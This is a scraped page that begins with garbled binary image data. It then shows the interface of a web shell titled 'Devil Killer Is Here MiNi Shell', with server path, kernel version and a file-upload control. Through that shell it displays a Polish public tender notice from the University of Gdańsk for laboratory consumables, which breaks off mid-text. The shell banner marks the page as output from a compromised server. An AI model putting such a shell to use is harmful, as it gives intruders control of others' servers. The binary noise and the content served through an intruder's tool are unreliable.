JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250307/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250307/0013737501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa materiałów zużywalnych dla Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG według 3 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET GDAŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001330</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Bażyńskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-309</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariatdzp@ug.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ug.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa materiałów zużywalnych dla Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG według 3 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79c09be6-bbf4-4265-a1c0-4903e6ba9109</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00137375</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Science for Welfare, Innovations and Forceful Therapies (SWIFT)” i „Diagnostyka NSCLC – Algorytm” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w niniejszym postępowaniu, w tym wymiana informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej platformazakupowa.pl (dalej platforma) pod adresem:https://platformazakupowa.pl/pn/ug.<br/>2. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:zakładce„Regulamin” dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert zamieszczonej na stronie internetowej platformy w zakładce „Instrukcje” dostępnej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,<br/>7) oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>4. Komunikacja poprzez formularz „Wyślij wiadomość” (nie dotyczy składania ofert) umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów przy maksymalnej sumarycznej wielkości 500 MB.<br/>5. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z rozporządzeniem Rady Ministrów z dnia 21 maja 2014 r. w spraw Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U. z 2024 r. poz. 773). Zamawiający rekomenduje wykorzystanie formatów danych: .pdf, .doc,.docx, .rtf, .odt, .xls, ze szczególnym wskazaniem na .pdf.<br/>6. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z.<br/>7. Zamawiający będzie przekazywał Wykonawcom informacje w postaci elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące wyjaśnienia treści SWZ, zmiany treści SWZ, zmiany terminu składania i otwarcia ofert, Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w postaci elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy.<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej wskazanej w pkt 9.<br/>9. Osoby uprawnione do komunikowania się z Wykonawcami:<br/>1) Ewa Rola – pracownik Działu Zamówień Publicznych w Centrum Zamówień Publicznych, e-mail: ewa.rola@ug.edu.pl.2) Marta Kujawska-Nowik - pracownik Działu Zamówień Publicznych w Centrum Zamówień Publicznych, e-mail: marta.kujawska-nowik@ug.edu.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z ogólnym rozporządzeniem o ochronie danych z dnia 27 kwietnia 2016 r. zwanym dalej RODO informujemy, iż:<br/>1. Administratorem Pani/Pana danych osobowych jest Uniwersytet Gdański z siedzibą w (80-309) Gdańsku przy ul. Jana Bażyńskiego 8.<br/>2. Administrator danych osobowych powołał Inspektora Ochrony Danych, z którym można skontaktować się pod numerem telefonu (58) 523 31 30lub adresem e-mail: iod@ug.edu.pl. Z Inspektorem Ochrony Danych można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z ich przetwarzaniem.<br/>3. Państwa dane osobowe będą przetwarzane w celu prowadzenia postępowania o udzielenie zamówienia publicznego, oraz w celu wykonania umowy zawartej w wyniku rozstrzygnięcia ww. postępowania (po wyborze najkorzystniejszej oferty), lub podjęcia działań przed zawarciem umowy.<br/>4. Podstawą prawną do przetwarzania Państwa danych osobowych są:<br/>1) art. 6 ust. 1 lit. b - przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy.<br/>2) art. 6 ust. 1 lit. c - przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>3) art. 6 ust. 1 lit. e - przetwarzanie jest niezbędne do wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej administratorowi.<br/>5. Państwa dane osobowe będą przechowywane przez okres niezbędny do realizacji celów wskazanych w pkt 3, oraz przez okres zgodny zobowiązującymi przepisami Pzp, tj. min. okres 4 lat liczony od dnia 1 stycznia następującego po dniu zakończenia postępowania.<br/>6. Odbiorcami Państwa danych mogą być podmioty posiadające prawo dostępu do danych na podstawie obowiązujących przepisów prawa, oraz podmioty współpracujące z Administratorem danych, w szczególności dostawcy usług IT, na podstawie zawartych umów, zgodnie z obowiązującym przepisami prawa w zakresie ochrony danych osobowych.<br/>7. Podanie przez Państwa danych osobowych jest dobrowolne, ale niezbędne i warunkujące zawarcie i realizację umowy, porozumienia lub ugody.<br/>8. Przysługuje Państwu prawo dostępu do swoich danych osobowych oraz ich sprostowania, ograniczenia przetwarzania, a także prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, jeśli uznają Państwo, że przetwarzanie narusza przepisy RODO.<br/>9. Nie przysługuje Państwu prawo do usunięcia danych, przenoszenia danych oraz sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania jest art. 6 ust. 1 lit. b i c RODO.<br/>10. Państwa dane nie będą poddane przetwarzaniu w sposób zautomatyzowany, oraz nie będą przekazywane do państw trzecich (poza obszar EOG).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5B10.291.1.37.2025.ER</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest sukcesywna dostawa materiałów zużywalnych, zwanych dalej „materiałami”, dla Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG według części:<br/>część I: Materiały zużywalne - końcówki do pipet, sterylne pipety serologiczne, pipety Pasteura,<br/>2.	Kod Klasyfikacji Wspólnego Słownika Zamówień (CPV): 38437000-7 (pipety i akcesoria laboratoryjne), 19520000 (produkty z tworzyw sztucznych).<br/>3.	Pod pojęciem „sukcesywnej dostawy” należy rozumieć dokonywanie etapami zamówień częściowych (w różnych ilościach) składanych drogą elektroniczną (poczta elektroniczna), przez uprawnionych pracowników Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG.<br/>4.	Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1a do SWZ - formularz przedmiotowo-cenowy – odpowiednio dla części I.<br/>5.	Zamówienie obejmuje m.in.:<br/>1)	sukcesywną dostawę materiałów w ramach zamówień częściowych, w terminie określonym w rozdziale V pkt 2 SWZ, <br/>2)	wniesienie do miejsca wskazanego w pkt 6.<br/>6.	Miejsce dostawy materiałów: Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG, ul. Kładki 24, 80-822, Gdańsk, pokój 302. <br/>7.	Przewidywana skala potrzeb Zamawiającego została zawarta w załączniku nr 1a do SWZ – formularzu przedmiotowo-cenowym – odpowiednio dla części I. Zamawiający informuje, że podane ilości w formularzu przedmiotowo-cenowym – odpowiednio dla części I, poszczególnych zamówień są ilościami przewidywanymi (szacunkowymi), nie wiążącymi Zamawiającego i mogą ulec zmianie, co nie będzie stanowić zmiany umowy. Rzeczywista ilość poszczególnych zamówień wynikać będzie z bieżących potrzeb Zamawiającego, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy łącznej ceny oferty.<br/>8.	Zamawiający zastrzega sobie prawo do rezygnacji z części zamówienia maksymalnie o 20% wartości brutto wynagrodzenia Wykonawcy. W tym przypadku Wykonawcy nie przysługują jakiekolwiek roszczenia w stosunku <br/>do Zamawiającego, w tym żądanie wykonania umowy do wysokości kwoty wynagrodzenia wskazanego w formularzu ofertowym – załączniku nr 1 do SWZ - odpowiednio dla części I . Przewidziana w niniejszym punkcie rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnej Wykonawcy. Skorzystanie z tego prawa nie stanowi zmiany umowy.<br/>9.	Zamawiający informuje, że zakup będzie finansowany z projektów: „Science for Welfare, Innovations and Forceful Therapies (SWIFT)”, Program Fundacji na rzecz Nauki Polskiej pt. Międzynarodowe Agendy Badawcze finansowanym z programu Fundusze Europejskie dla Nowoczesnej Gospodarki (MAB FENG) oraz „Diagnostyka NSCLC – Algorytm” (DiaNA) - Konkurs dla jednostek naukowych na realizację badań o charakterze aplikacyjnym w obszarze biomedycznym (2024/ABM/03/KPO) w ramach Krajowego Planu Odbudowy i Zwiększania Odporności (KPO), Komponentu D Efektywność, dostępność i jakość systemu ochrony zdrowia, Inwestycji D3.1.1 Kompleksowy rozwój badań w zakresie nauk medycznych i nauk o zdrowiu. Instytucja finansująca: Agencja Badań Medycznych.<br/>10.	Zamawiający wymaga gwarancji na materiały na okres 24 miesięcy. Szczegóły dotyczące świadczeń gwarancyjnych i reklamacyjnych zawarte są w § 7 projektu umowy - załącznika nr 4 do SWZ – odpowiednio dla części I. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38437000-7 - Pipety i akcesoria laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówień częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest sukcesywna dostawa materiałów zużywalnych, zwanych dalej „materiałami”, dla Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG według części:<br/>część II: Materiały zużywalne - do hodowli komórkowej<br/>2.	Kod Klasyfikacji Wspólnego Słownika Zamówień (CPV): 38437000-7 (pipety i akcesoria laboratoryjne), 19520000 (produkty z tworzyw sztucznych).<br/>3.	Pod pojęciem „sukcesywnej dostawy” należy rozumieć dokonywanie etapami zamówień częściowych (w różnych ilościach) składanych drogą elektroniczną (poczta elektroniczna), przez uprawnionych pracowników Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG.<br/>4.	Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1a do SWZ - formularz przedmiotowo-cenowy – odpowiednio dla części II.<br/>5.	Zamówienie obejmuje m.in.:<br/>1)	sukcesywną dostawę materiałów w ramach zamówień częściowych, w terminie określonym w rozdziale V pkt 2 SWZ, <br/>2)	wniesienie do miejsca wskazanego w pkt 6.<br/>6.	Miejsce dostawy materiałów: Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG, ul. Kładki 24, 80-822, Gdańsk, pokój 302. <br/>7.	Przewidywana skala potrzeb Zamawiającego została zawarta w załączniku nr 1a do SWZ – formularzu przedmiotowo-cenowym – odpowiednio dla części II. Zamawiający informuje, że podane ilości w formularzu przedmiotowo-cenowym – odpowiednio dla części II, poszczególnych zamówień są ilościami przewidywanymi (szacunkowymi), nie wiążącymi Zamawiającego i mogą ulec zmianie, co nie będzie stanowić zmiany umowy. Rzeczywista ilość poszczególnych zamówień wynikać będzie z bieżących potrzeb Zamawiającego, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy łącznej ceny oferty.<br/>8.	Zamawiający zastrzega sobie prawo do rezygnacji z części zamówienia maksymalnie o 20% wartości brutto wynagrodzenia Wykonawcy. W tym przypadku Wykonawcy nie przysługują jakiekolwiek roszczenia w stosunku <br/>do Zamawiającego, w tym żądanie wykonania umowy do wysokości kwoty wynagrodzenia wskazanego <br/>w formularzu ofertowym – załączniku nr 1 do SWZ - odpowiednio dla części II. Przewidziana w niniejszym punkcie rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnej Wykonawcy. Skorzystanie z tego prawa nie stanowi zmiany umowy.<br/>9.	Zamawiający informuje, że zakup będzie finansowany z projektów: „Science for Welfare, Innovations and Forceful Therapies (SWIFT)”, Program Fundacji na rzecz Nauki Polskiej pt. Międzynarodowe Agendy Badawcze finansowanym z programu Fundusze Europejskie dla Nowoczesnej Gospodarki (MAB FENG) oraz „Diagnostyka NSCLC – Algorytm” (DiaNA) - Konkurs dla jednostek naukowych na realizację badań o charakterze aplikacyjnym w obszarze biomedycznym (2024/ABM/03/KPO) w ramach Krajowego Planu Odbudowy i Zwiększania Odporności (KPO), Komponentu D Efektywność, dostępność i jakość systemu ochrony zdrowia, Inwestycji D3.1.1 Kompleksowy rozwój badań w zakresie nauk medycznych i nauk o zdrowiu. Instytucja finansująca: Agencja Badań Medycznych.<br/>10.	Zamawiający wymaga gwarancji na materiały na okres 24 miesięcy. Szczegóły dotyczące świadczeń gwarancyjnych <br/>i reklamacyjnych zawarte są w § 7 projektu umowy - załącznika nr 4 do SWZ – odpowiednio dla części II. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38437000-7 - Pipety i akcesoria laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówień częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest sukcesywna dostawa materiałów zużywalnych, zwanych dalej „materiałami”, dla Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG według części:<br/>część III: Materiały zużywalne - do 